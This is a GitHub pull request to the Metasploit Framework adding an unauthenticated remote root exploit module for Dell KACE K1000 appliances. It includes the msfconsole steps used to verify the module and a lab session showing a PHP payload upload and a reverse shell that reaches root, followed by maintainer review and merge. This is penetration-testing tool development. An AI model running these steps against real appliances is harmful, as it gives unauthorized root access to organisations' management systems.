Add Dell Kace K1000 unauthenticated remote root exploit #6773

Merged
merged 1 commit into from Apr 13, 2016

Projects

None yet

3 participants

@bcoles
Contributor
bcoles commented Apr 12, 2016

Add Dell Kace K1000 unauthenticated remote root exploit for versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547.

Verification

  • Use your Dell Support user account to locate and download the outdated and vulnerable K1000 trial appliance.
  • $ msfconsole
  • > use exploit/unix/http/dell_kace_k1000_upload
  • > set rhost <rhost>
  • > set verbose true
  • > check
  • > run
  • > id

Output

msf > use exploit/unix/http/dell_kace_k1000_upload 
msf exploit(dell_kace_k1000_upload) > show options

Module options (exploit/unix/http/dell_kace_k1000_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(dell_kace_k1000_upload) > set rhost 192.168.18.123
rhost => 192.168.18.123
msf exploit(dell_kace_k1000_upload) > set verbose true
verbose => true
msf exploit(dell_kace_k1000_upload) > check

[*] Found Dell KACE K1000 version 5.3.53053
[+] The target is vulnerable.
msf exploit(dell_kace_k1000_upload) > run

[*] Started reverse TCP handler on 192.168.18.160:4444 
[*] Uploading .pKWbnhT43Wh.php (620 bytes)
[+] Payload uploaded successfully
[*] Command shell session 1 opened (192.168.18.160:4444 -> 192.168.18.123:51317) at 2016-04-12 11:44:13 -0400
[+] Payload executed successfully

id 
uid=0(root) gid=0(wheel) groups=0(wheel)
pwd
/
uname -a
FreeBSD kbox 7.0-STABLE FreeBSD 7.0-STABLE #0: Thu May  1 14:53:40 UTC 2008     tom@beavis.tomwhit.org:/usr/obj/usr/src/sys/KBOX1200  amd64
@wvu-r7
Contributor
wvu-r7 commented Apr 12, 2016

Yay, FreeBSD. :)

@wchen-r7
Contributor

@bcoles Is there a virtual appliance that I can download and test? It looks like I can only test their lab machine.

@bcoles
Contributor
bcoles commented Apr 13, 2016

@wchen-r7 You can download a trial in OVF format from the Support portal.

These versions are likely vulnerable:

  • hxxps://support.software.dell.com/k1000-systems-management-appliance/5.3.47927
  • hxxps://support.software.dell.com/k1000-systems-management-appliance/5.4.70402
@wchen-r7
Contributor

A valid support Maintenance contract is required to download the old versions. Fortunately we have a pcap, so we can land this. Thanks @bcoles

@wchen-r7
Contributor

Code looks good. I will land it.

@wchen-r7 wchen-r7 self-assigned this Apr 13, 2016
@wchen-r7 wchen-r7 merged commit b61175c into rapid7:master Apr 13, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
@wchen-r7 wchen-r7 added a commit that referenced this pull request Apr 13, 2016
@wchen-r7 wchen-r7 Land #6773, Add Dell Kace K1000 unauthenticated remote root exploit c52a639
@bcoles bcoles deleted the bcoles:dell_kace_k1000_upload branch Apr 22, 2016
@h00die h00die referenced this pull request Jun 8, 2016
Closed

PoC for Dell KACE K1000 #5128

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment